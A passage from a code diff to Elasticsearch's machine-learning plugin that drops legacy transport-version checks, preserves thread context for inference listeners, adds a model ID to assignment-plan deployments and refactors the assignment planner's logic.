import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.admin.indices.rollover.RolloverRequest; import org.elasticsearch.action.support.IndicesOptions; @@ -31,6 +30,7 @@ import java.util.ArrayList; import java.util.List; +import static org.elasticsearch.TransportVersions.ML_ROLLOVER_LEGACY_INDICES; import static org.elasticsearch.xpack.core.ClientHelper.ML_ORIGIN; /** @@ -60,7 +60,7 @@ public MlIndexRollover(List indicesToRollover, IndexNameEx public boolean isMinTransportVersionSupported(TransportVersion minTransportVersion) { // Wait for all nodes to be upgraded to ensure that the // newly created index will be of the latest version. - return minTransportVersion.onOrAfter(TransportVersions.ML_ROLLOVER_LEGACY_INDICES); + return minTransportVersion.supports(ML_ROLLOVER_LEGACY_INDICES); } @Override diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java index c4915ef45c16d..0eb10aa33b9c7 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java @@ -12,6 +12,7 @@ import org.elasticsearch.action.FailedNodeException; import org.elasticsearch.action.TaskOperationFailure; import org.elasticsearch.action.support.ActionFilters; +import org.elasticsearch.action.support.ContextPreservingActionListener; import org.elasticsearch.action.support.tasks.TransportTasksAction; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.util.concurrent.AtomicArray; @@ -20,6 +21,7 @@ import org.elasticsearch.injection.guice.Inject; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.tasks.CancellableTask; +import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.TransportService; import org.elasticsearch.xpack.core.ml.action.InferTrainedModelDeploymentAction; import org.elasticsearch.xpack.core.ml.inference.results.ErrorInferenceResults; @@ -37,11 +39,14 @@ public class TransportInferTrainedModelDeploymentAction extends TransportTasksAc InferTrainedModelDeploymentAction.Response, InferTrainedModelDeploymentAction.Response> { + private final ThreadPool threadPool; + @Inject public TransportInferTrainedModelDeploymentAction( ClusterService clusterService, TransportService transportService, - ActionFilters actionFilters + ActionFilters actionFilters, + ThreadPool threadPool ) { super( InferTrainedModelDeploymentAction.NAME, @@ -52,6 +57,7 @@ public TransportInferTrainedModelDeploymentAction( InferTrainedModelDeploymentAction.Response::new, EsExecutors.DIRECT_EXECUTOR_SERVICE ); + this.threadPool = threadPool; } @Override @@ -99,6 +105,9 @@ protected void taskOperation( // and return order the results to match the request order AtomicInteger count = new AtomicInteger(); AtomicArray results = new AtomicArray<>(nlpInputs.size()); + + var contextPreservingListener = ContextPreservingActionListener.wrapPreservingContext(listener, threadPool.getThreadContext()); + int slot = 0; for (var input : nlpInputs) { task.infer( @@ -109,7 +118,7 @@ protected void taskOperation( request.getPrefixType(), actionTask, request.isChunkResults(), - orderedListener(count, results, slot++, nlpInputs.size(), listener) + orderedListener(count, results, slot++, nlpInputs.size(), contextPreservingListener) ); } } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java index 74a3a3c561334..38619fce5ff0d 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/correlation/BucketCorrelationAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.ml.aggs.correlation; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.BucketHelpers; @@ -138,6 +137,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java index f2bb12b13e30f..3f9d2fd4b8061 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/inference/InferencePipelineAggregationBuilder.java @@ -9,7 +9,6 @@ import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.client.internal.Client; import org.elasticsearch.common.Strings; @@ -381,6 +380,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java index 3742d88374dd1..1173fbdcbf5e5 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/aggs/kstest/BucketCountKSTestAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.ml.aggs.kstest; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; @@ -186,6 +185,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java index b359daebd5368..9d516fb3e1a74 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentClusterService.java @@ -11,8 +11,6 @@ import org.apache.logging.log4j.Logger; import org.elasticsearch.ElasticsearchStatusException; import org.elasticsearch.ResourceNotFoundException; -import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.ActionRequestValidationException; import org.elasticsearch.action.support.master.AcknowledgedResponse; @@ -79,9 +77,6 @@ public class TrainedModelAssignmentClusterService implements ClusterStateListene private static final Logger logger = LogManager.getLogger(TrainedModelAssignmentClusterService.class); - private static final TransportVersion RENAME_ALLOCATION_TO_ASSIGNMENT_TRANSPORT_VERSION = TransportVersions.V_8_3_0; - public static final TransportVersion DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION = TransportVersions.V_8_4_0; - private final ClusterService clusterService; private final ThreadPool threadPool; private final NodeLoadDetector nodeLoadDetector; @@ -169,14 +164,6 @@ public void clusterChanged(ClusterChangedEvent event) { return; } - if (eventStateMinTransportVersionIsBeforeDistributedModelAllocationTransportVersion(event)) { - // we should not try to rebalance assignments while there may be nodes running on a version - // prior to introducing distributed model allocation. - // But we should remove routing to removed or shutting down nodes. - removeRoutingToRemovedOrShuttingDownNodes(event); - return; - } - if (event.nodesAdded()) { logMlNodeHeterogeneity(); } @@ -203,10 +190,6 @@ public void clusterChanged(ClusterChangedEvent event) { } } - boolean eventStateMinTransportVersionIsBeforeDistributedModelAllocationTransportVersion(ClusterChangedEvent event) { - return event.state().getMinTransportVersion().before(DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION); - } - boolean eventStateHasGlobalBlockStateNotRecoveredBlock(ClusterChangedEvent event) { return event.state().blocks().hasGlobalBlock(GatewayService.STATE_NOT_RECOVERED_BLOCK); } @@ -400,18 +383,6 @@ public void createNewModelAssignment( CreateTrainedModelAssignmentAction.Request request, ActionListener listener ) { - if (clusterService.state().getMinTransportVersion().before(DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION)) { - listener.onFailure( - new ElasticsearchStatusException( - "cannot create new assignment [{}] for model [{}] while cluster upgrade is in progress", - RestStatus.CONFLICT, - request.getTaskParams().getDeploymentId(), - request.getTaskParams().getModelId() - ) - ); - return; - } - if (MlMetadata.getMlMetadata(clusterService.state()).isResetMode()) { listener.onFailure( new ElasticsearchStatusException( @@ -522,13 +493,11 @@ private static ClusterState update(ClusterState currentState, TrainedModelAssign private static ClusterState forceUpdate(ClusterState currentState, TrainedModelAssignmentMetadata.Builder modelAssignments) { logger.debug(() -> format("updated assignments: %s", modelAssignments.build())); + ProjectMetadata.Builder builder = ProjectMetadata.builder(currentState.metadata().getProject()); - if (currentState.getMinTransportVersion().onOrAfter(RENAME_ALLOCATION_TO_ASSIGNMENT_TRANSPORT_VERSION)) { - builder.putCustom(TrainedModelAssignmentMetadata.NAME, modelAssignments.build()) - .removeCustom(TrainedModelAssignmentMetadata.DEPRECATED_NAME); - } else { - builder.putCustom(TrainedModelAssignmentMetadata.DEPRECATED_NAME, modelAssignments.buildOld()); - } + builder.putCustom(TrainedModelAssignmentMetadata.NAME, modelAssignments.build()) + .removeCustom(TrainedModelAssignmentMetadata.DEPRECATED_NAME); + return ClusterState.builder(currentState).putProjectMetadata(builder).build(); } @@ -844,7 +813,7 @@ private void updateDeployment( } boolean hasUpdates = hasUpdates(numberOfAllocations, adaptiveAllocationsSettingsUpdates, existingAssignment); if (hasUpdates == false) { - logger.info("no updates"); + logger.debug("no updates to be made for deployment [{}]", deploymentId); listener.onResponse(existingAssignment); return; } @@ -858,19 +827,9 @@ private void updateDeployment( ); return; } - if (clusterState.getMinTransportVersion().before(DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION)) { - listener.onFailure( - new ElasticsearchStatusException( - "cannot update deployment with model id [{}] while cluster upgrade is in progress.", - RestStatus.CONFLICT, - deploymentId - ) - ); - return; - } - ActionListener updatedStateListener = ActionListener.wrap( - updatedState -> submitUnbatchedTask("update model deployment", new ClusterStateUpdateTask() { + ActionListener updatedAssignmentListener = ActionListener.wrap( + updatedAssignment -> submitUnbatchedTask("update model deployment", new ClusterStateUpdateTask() { private volatile boolean isUpdated; @@ -878,7 +837,7 @@ private void updateDeployment( public ClusterState execute(ClusterState currentState) { if (areClusterStatesCompatibleForRebalance(clusterState, currentState)) { isUpdated = true; - return updatedState; + return update(currentState, updatedAssignment); } logger.debug(() -> format("[%s] Retrying update as cluster state has been modified", deploymentId)); updateDeployment(currentState, deploymentId, numberOfAllocations, adaptiveAllocationsSettings, isInternal, listener); @@ -910,7 +869,7 @@ public void clusterStateProcessed(ClusterState oldState, ClusterState newState) listener::onFailure ); - updateAssignment(clusterState, existingAssignment, numberOfAllocations, adaptiveAllocationsSettings, updatedStateListener); + updateAssignment(clusterState, existingAssignment, numberOfAllocations, adaptiveAllocationsSettings, updatedAssignmentListener); } static boolean hasUpdates( @@ -944,7 +903,7 @@ private void updateAssignment( TrainedModelAssignment assignment, Integer numberOfAllocations, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { threadPool.executor(MachineLearning.UTILITY_THREAD_POOL_NAME).execute(() -> { if (numberOfAllocations == null || numberOfAllocations == assignment.getTaskParams().getNumberOfAllocations()) { @@ -961,13 +920,13 @@ private void updateAndKeepNumberOfAllocations( ClusterState clusterState, TrainedModelAssignment assignment, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { TrainedModelAssignment.Builder updatedAssignment = TrainedModelAssignment.Builder.fromAssignment(assignment) .setAdaptiveAllocationsSettings(adaptiveAllocationsSettings); TrainedModelAssignmentMetadata.Builder builder = TrainedModelAssignmentMetadata.builder(clusterState); builder.updateAssignment(assignment.getDeploymentId(), updatedAssignment); - listener.onResponse(update(clusterState, builder)); + listener.onResponse(builder); } private void increaseNumberOfAllocations( @@ -975,7 +934,7 @@ private void increaseNumberOfAllocations( TrainedModelAssignment assignment, int numberOfAllocations, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { try { TrainedModelAssignment.Builder updatedAssignment = TrainedModelAssignment.Builder.fromAssignment(assignment) @@ -995,7 +954,7 @@ private void increaseNumberOfAllocations( ) ); } else { - listener.onResponse(update(clusterState, rebalancedMetadata)); + listener.onResponse(rebalancedMetadata); } } catch (Exception e) { listener.onFailure(e); @@ -1007,7 +966,7 @@ private void decreaseNumberOfAllocations( TrainedModelAssignment assignment, int numberOfAllocations, AdaptiveAllocationsSettings adaptiveAllocationsSettings, - ActionListener listener + ActionListener listener ) { TrainedModelAssignment.Builder updatedAssignment = numberOfAllocations < assignment.totalTargetAllocations() ? new AllocationReducer(assignment, nodeAvailabilityZoneMapper.buildMlNodesByAvailabilityZone(clusterState)).reduceTo( @@ -1022,7 +981,7 @@ private void decreaseNumberOfAllocations( } TrainedModelAssignmentMetadata.Builder builder = TrainedModelAssignmentMetadata.builder(clusterState); builder.updateAssignment(assignment.getDeploymentId(), updatedAssignment); - listener.onResponse(update(clusterState, builder)); + listener.onResponse(builder); } static ClusterState setToStopping(ClusterState clusterState, String deploymentId, String reason) { diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java index c86b3e710a736..83db62e2da4de 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentNodeService.java @@ -375,12 +375,9 @@ public void clusterChanged(ClusterChangedEvent event) { final boolean isResetMode = MlMetadata.getMlMetadata(event.state()).isResetMode(); TrainedModelAssignmentMetadata modelAssignmentMetadata = TrainedModelAssignmentMetadata.fromState(event.state()); final String currentNode = event.state().nodes().getLocalNodeId(); - final boolean isNewAllocationSupported = event.state() - .getMinTransportVersion() - .onOrAfter(TrainedModelAssignmentClusterService.DISTRIBUTED_MODEL_ALLOCATION_TRANSPORT_VERSION); final Set shuttingDownNodes = Collections.unmodifiableSet(event.state().metadata().nodeShutdowns().getAllNodeIds()); - if (isResetMode == false && isNewAllocationSupported) { + if (isResetMode == false) { updateNumberOfAllocations(modelAssignmentMetadata); } @@ -388,7 +385,7 @@ public void clusterChanged(ClusterChangedEvent event) { RoutingInfo routingInfo = trainedModelAssignment.getNodeRoutingTable().get(currentNode); if (routingInfo != null) { // Add new models to start loading if the assignment is not stopping - if (isNewAllocationSupported && trainedModelAssignment.getAssignmentState() != AssignmentState.STOPPING) { + if (trainedModelAssignment.getAssignmentState() != AssignmentState.STOPPING) { if (shouldAssignmentBeRestarted(routingInfo, trainedModelAssignment.getDeploymentId())) { prepareAssignmentForRestart(trainedModelAssignment); } diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java index 20cbdaecaa222..90f86dbc243f0 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/TrainedModelAssignmentRebalancer.java @@ -130,19 +130,15 @@ private static AssignmentPlan mergePlans( return finalPlanBuilder.build(); } - private static void copyAssignments( - AssignmentPlan source, - AssignmentPlan.Builder dest, - Map originalNodeById - ) { - for (AssignmentPlan.Deployment m : source.deployments()) { - Map nodeAssignments = source.assignments(m).orElse(Map.of()); - for (Map.Entry assignment : nodeAssignments.entrySet()) { - AssignmentPlan.Node originalNode = originalNodeById.get(assignment.getKey().id()); - dest.assignModelToNode(m, originalNode, assignment.getValue()); - // As the node has all its available memory we need to manually account memory of models with - // current allocations. - dest.accountMemory(m, originalNode); + /** + * Transfers assignments from the source AssignmentPlan to the destination AssignmentPlan.Builder. + */ + static void copyAssignments(AssignmentPlan source, AssignmentPlan.Builder dest, Map originalNodeById) { + for (AssignmentPlan.Deployment deployment : source.deployments()) { + Map sourceNodeAssignments = source.assignments(deployment).orElse(Map.of()); + for (Map.Entry sourceAssignment : sourceNodeAssignments.entrySet()) { + AssignmentPlan.Node node = originalNodeById.get(sourceAssignment.getKey().id()); + dest.assignModelToNode(deployment, node, sourceAssignment.getValue()); } } } @@ -169,6 +165,7 @@ private AssignmentPlan computePlanForNormalPriorityModels( .collect(Collectors.toMap(Map.Entry::getKey, e -> e.getValue().getTargetAllocations())); return new AssignmentPlan.Deployment( assignment.getDeploymentId(), + assignment.getModelId(), assignment.getTaskParams().getModelBytes(), assignment.getTaskParams().getNumberOfAllocations(), assignment.getTaskParams().getThreadsPerAllocation(), @@ -185,6 +182,7 @@ private AssignmentPlan computePlanForNormalPriorityModels( planDeployments.add( new AssignmentPlan.Deployment( taskParams.getDeploymentId(), + taskParams.getModelId(), taskParams.getModelBytes(), taskParams.getNumberOfAllocations(), taskParams.getThreadsPerAllocation(), @@ -225,6 +223,7 @@ private AssignmentPlan computePlanForLowPriorityModels(Set assignableNod .map( assignment -> new AssignmentPlan.Deployment( assignment.getDeploymentId(), + assignment.getModelId(), assignment.getTaskParams().getModelBytes(), assignment.getTaskParams().getNumberOfAllocations(), assignment.getTaskParams().getThreadsPerAllocation(), @@ -242,6 +241,7 @@ private AssignmentPlan computePlanForLowPriorityModels(Set assignableNod planDeployments.add( new AssignmentPlan.Deployment( taskParams.getDeploymentId(), + taskParams.getModelId(), taskParams.getModelBytes(), taskParams.getNumberOfAllocations(), taskParams.getThreadsPerAllocation(), @@ -298,9 +298,7 @@ private Map, List> createNodesByZoneMap() { nodes.add( new AssignmentPlan.Node( discoveryNode.getId(), - // We subtract native inference memory as the planner expects available memory for - // native inference including current assignments. - getNodeFreeMemoryExcludingPerNodeOverheadAndNativeInference(load), + load.getFreeMemoryExcludingPerNodeOverhead(), MlProcessors.get(discoveryNode, allocatedProcessorsScale).roundUp() ) ); @@ -317,10 +315,6 @@ private Map, List> createNodesByZoneMap() { })); } - private static long getNodeFreeMemoryExcludingPerNodeOverheadAndNativeInference(NodeLoad load) { - return load.getFreeMemoryExcludingPerNodeOverhead() - load.getAssignedNativeInferenceMemory(); - } - private TrainedModelAssignmentMetadata.Builder buildAssignmentsFromPlan(AssignmentPlan assignmentPlan) { TrainedModelAssignmentMetadata.Builder builder = TrainedModelAssignmentMetadata.Builder.empty(); for (AssignmentPlan.Deployment deployment : assignmentPlan.deployments()) { diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java index 66b8d9e570211..8a0bbe2ecdd5e 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AbstractPreserveAllocations.java @@ -55,6 +55,7 @@ Deployment modifyModelPreservingPreviousAssignments(Deployment m) { return new Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations() - calculatePreservedAllocations(m), m.threadsPerAllocation(), @@ -69,7 +70,7 @@ Deployment modifyModelPreservingPreviousAssignments(Deployment m) { AssignmentPlan mergePreservedAllocations(AssignmentPlan assignmentPlan) { // As the model/node objects the assignment plan are the modified ones, // they will not match the models/nodes members we have in this class. - // Therefore, we build a lookup table based on the ids, so we can merge the plan + // Therefore, we build a lookup table based on the ids so we can merge the plan // with its preserved allocations. final Map, Integer> plannedAssignmentsByDeploymentNodeIdPair = new HashMap<>(); for (Deployment d : assignmentPlan.deployments()) { @@ -84,6 +85,7 @@ AssignmentPlan mergePreservedAllocations(AssignmentPlan assignmentPlan) { AssignmentPlan.Builder mergedPlanBuilder = AssignmentPlan.builder(nodes, deployments); for (Node n : nodes) { + // TODO (#101612) Should the first loop happen in the builder constructor? for (Deployment deploymentAllocationsToPreserve : deployments) { // if the model m is already allocated on the node n and I want to preserve this allocation diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java index c294e7b2de792..a90a8cb9d5262 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlan.java @@ -47,6 +47,7 @@ public class AssignmentPlan implements Comparable { */ public record Deployment( String deploymentId, + String modelId, long memoryBytes, int allocations, int threadsPerAllocation, @@ -59,6 +60,7 @@ public record Deployment( ) { public Deployment( String deploymentId, + String modelId, long modelBytes, int allocations, int threadsPerAllocation, @@ -70,6 +72,7 @@ public Deployment( ) { this( deploymentId, + modelId, modelBytes, allocations, threadsPerAllocation, @@ -96,7 +99,7 @@ boolean hasEverBeenAllocated() { public long estimateMemoryUsageBytes(int allocations) { return StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, @@ -106,24 +109,23 @@ public long estimateMemoryUsageBytes(int allocations) { long estimateAdditionalMemoryUsageBytes(int allocationsOld, int allocationsNew) { return StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, allocationsNew ) - StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, allocationsOld ); - } long minimumMemoryRequiredBytes() { return StartTrainedModelDeploymentAction.estimateMemoryUsageBytes( - deploymentId, + modelId, memoryBytes, perDeploymentMemoryBytes, perAllocationMemoryBytes, @@ -221,23 +223,43 @@ public int compareTo(AssignmentPlan o) { return Comparator.comparing(AssignmentPlan::computeQuality).compare(this, o); } + /** + * Checks whether all deployments in the current {@link AssignmentPlan} have at least as many + * allocations as currently assigned. + */ public boolean satisfiesCurrentAssignments() { return deployments().stream().allMatch(this::isSatisfyingCurrentAssignmentsForModel); } + /** + * Checks whether the current assignments for a given {@link Deployment} meet its allocation requirements. + * + * It ensures that the total number of allocations assigned to the deployment across all nodes is + * at least equal to the deployment's current assigned allocations. + */ private boolean isSatisfyingCurrentAssignmentsForModel(Deployment m) { if (m.currentAllocationsByNodeId().isEmpty()) { return true; } Map nodeAssignments = assignments.get(m); - int currentAllocations = nodeAssignments.values().stream().mapToInt(Integer::intValue).sum(); - return currentAllocations >= m.getCurrentAssignedAllocations(); + int inPlanAssignedAllocations = nodeAssignments.values().stream().mapToInt(Integer::intValue).sum(); + return inPlanAssignedAllocations >= m.getCurrentAssignedAllocations(); } - public boolean satisfiesAllocations(Deployment m) { - return remainingModelAllocations.getOrDefault(m, 0) == 0; + /** + * Checks if the current assignments satisfy the deployment's allocation requirements. + * @param deployment the deployment to check + * @return true if the current assignments satisfy the deployment's allocation requirements, false otherwise + */ + public boolean satisfiesAllocations(Deployment deployment) { + return remainingModelAllocations.getOrDefault(deployment, 0) == 0; } + /** + * Checks if the current assignments satisfy all deployments' allocation requirements. This means that + * each deployment has no remaining allocations left to assign. + * @return true if the current assignments satisfy the deployments' allocation requirements, false otherwise + */ public boolean satisfiesAllModels() { return deployments().stream().allMatch(this::satisfiesAllocations); } @@ -447,7 +469,7 @@ public Builder assignModelToNode(Deployment deployment, Node node, int allocatio ); } - assignments.get(deployment).compute(node, (n, remAllocations) -> remAllocations + allocations); + assignments.get(deployment).compute(node, (n, assignedAllocations) -> assignedAllocations + allocations); accountMemory(deployment, node, requiredMemory); if (deployment.priority == Priority.NORMAL) { @@ -458,24 +480,10 @@ public Builder assignModelToNode(Deployment deployment, Node node, int allocatio } private int getAssignedAllocations(Deployment deployment, Node node) { - int currentAllocations = getCurrentAllocations(deployment, node); - int assignmentAllocations = assignments.get(deployment).get(node); - return currentAllocations + assignmentAllocations; - } - - private static int getCurrentAllocations(Deployment m, Node n) { - return m.currentAllocationsByNodeId.containsKey(n.id()) ? m.currentAllocationsByNodeId.get(n.id()) : 0; - } - - public void accountMemory(Deployment m, Node n) { - if (m.currentAllocationsByNodeId().containsKey(n.id())) { - int allocations = m.currentAllocationsByNodeId().get(n.id()); - long requiredMemory = m.estimateMemoryUsageBytes(allocations); - accountMemory(m, n, requiredMemory); - } + return assignments.get(deployment).get(node); } - private void accountMemory(Deployment m, Node n, long requiredMemory) { + public void accountMemory(Deployment m, Node n, long requiredMemory) { remainingNodeMemory.computeIfPresent(n, (k, v) -> v - requiredMemory); if (remainingNodeMemory.containsKey(n) && remainingNodeMemory.get(n) < 0) { throw new IllegalArgumentException("not enough memory on node [" + n.id() + "] to assign model [" + m.deploymentId() + "]"); diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java index 8b33a9fd54fad..bb7998035ff46 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/inference/assignment/planning/AssignmentPlanner.java @@ -60,13 +60,26 @@ public AssignmentPlan computePlan() { return computePlan(true); } - public AssignmentPlan computePlan(boolean tryAssigningPreviouslyAssignedModels) { + /** + * Computes an {@link AssignmentPlan} for the given nodes and deployments. + * If {@code tryAssigningAllPreviouslyAllocatedModels} is true, then the plan will + * attempt to assign at least one allocation to previously assigned models. + * Otherwise, it will only ensure that deployments assigned to existing nodes will preserve at least one allocation + * + * @param tryAssigningAllPreviouslyAllocatedModels whether to do the best effort assigning previously assigned models somewhere + * with at least one allocation + * @return the computed assignment plan + */ + public AssignmentPlan computePlan(boolean tryAssigningAllPreviouslyAllocatedModels) { logger.debug(() -> format("Computing plan for nodes = %s; deployments = %s", nodes, deployments)); AssignmentPlan bestPlan; AssignmentPlan planSatisfyingCurrentAssignments = solveSatisfyingCurrentAssignments(); logger.debug(() -> "Plan satisfying current assignments =\n" + planSatisfyingCurrentAssignments.prettyPrint()); - if (planSatisfyingCurrentAssignments.arePreviouslyAssignedModelsAssigned() == false && tryAssigningPreviouslyAssignedModels) { + if (planSatisfyingCurrentAssignments.arePreviouslyAssignedModelsAssigned() || tryAssigningAllPreviouslyAllocatedModels == false) { + bestPlan = planSatisfyingCurrentAssignments; + } else { + // try to reuse any deployment that would otherwise drop to zero allocations AssignmentPlan planAllocatingAtLeastOnceModelsThatWerePreviouslyAllocated = solveAllocatingAtLeastOnceModelsThatWerePreviouslyAllocated(); logger.debug( @@ -82,8 +95,6 @@ public AssignmentPlan computePlan(boolean tryAssigningPreviouslyAssignedModels) ? planSatisfyingCurrentAssignments : planAllocatingAtLeastOnceModelsThatWerePreviouslyAllocated; } - } else { - bestPlan = planSatisfyingCurrentAssignments; } logger.debug(() -> "Best plan =\n" + bestPlan.prettyPrint()); @@ -91,19 +102,30 @@ public AssignmentPlan computePlan(boolean tryAssigningPreviouslyAssignedModels) return bestPlan; } + /** + * Computes the best assignment plan from two strategies: + * 1. Preserving one allocation on current assignments, which is the most flexible + * 2. Preserving all allocations on current assignments, which is more conservative + * @return the best assignment plan + */ private AssignmentPlan solveSatisfyingCurrentAssignments() { AssignmentPlan bestPlan; // First solve preserving one allocation per assignment because that is most flexible AssignmentPlan planKeepingOneAllocationOnCurrentAssignments = solveKeepingOneAllocationOnCurrentAssignments(); - if (planKeepingOneAllocationOnCurrentAssignments.satisfiesCurrentAssignments() == false) { + + if (planKeepingOneAllocationOnCurrentAssignments.satisfiesAllModels()) { + // If the plan satisfies all models, then we can use it as is + bestPlan = planKeepingOneAllocationOnCurrentAssignments; + } else if (planKeepingOneAllocationOnCurrentAssignments.satisfiesCurrentAssignments() == false) { + // If in the new assignment plan, some deployments have fewer allocations than in the current assignments, + // try explicitly preserving all allocations on current assignments. bestPlan = solvePreservingAllAllocationsOnCurrentAssignments(); - } else if (planKeepingOneAllocationOnCurrentAssignments.satisfiesAllModels() == false) { + } else { + // Choose the best strategy according to {@link AssignmentPlan#computeQuality(AssignmentPlan)} AssignmentPlan planKeepingAllAllocationsOnCurrentAssignments = solvePreservingAllAllocationsOnCurrentAssignments(); bestPlan = planKeepingAllAllocationsOnCurrentAssignments.compareTo(planKeepingOneAllocationOnCurrentAssignments) >= 0 ? planKeepingAllAllocationsOnCurrentAssignments : planKeepingOneAllocationOnCurrentAssignments; - } else { - bestPlan = 